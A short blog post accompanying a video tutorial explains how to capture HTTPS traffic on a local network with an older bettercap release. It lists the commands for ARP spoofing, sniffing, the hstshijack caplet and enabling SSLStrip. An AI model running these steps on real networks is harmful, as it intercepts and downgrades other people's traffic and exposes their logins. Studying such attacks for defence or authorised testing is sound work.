Skip to content

Capturing HTTPS traffic with BETTERCAP using SSLSTRIP and HSTSHijack – Explained – HOXFRAMEWORK

Posted in VIDEOS

Hello everyone and welcome back.

In this video we will be talking about HTTPS in general, SSLStrip, HSTSHijack, HTTPProxy and HTTPSProxy in the context of BETTERCAP. Thank you so much for watching and visit my website for more: hoxframework.com.hr – if you want. Have a nice day.

So first of all make sure you have the right version of bettercap installed (v2.23) – you can install it by removing your executable (you can find it using: which bettercap – when it shows you the location remove the bettercap file from there and replace it with a new one you download) – new (to be fair its older version because newer doesnt work) file can be downloaded on bettercap’s github : https://github.com/bettercap/bettercap/releases/download/v2.23/bettercap_linux_amd64_2.23.zip

Next up start your bettercap :

>bettercap -iface <your interface>

then start the following:

(if you dont have caplets run: caplets.update – while in bettercap)

  1. hstshijack/hstshijack
  2. arp.spoof
  3. net.sniff (and net.probe and net.recon)

if you want to use SSLStrip then before starting Hstshijack caplet run:

set http.proxy.sslstrip true

And thats basically it ! Everything else is explained (in detail) in the video.

Thank you so much for watching and have a nice day 🙂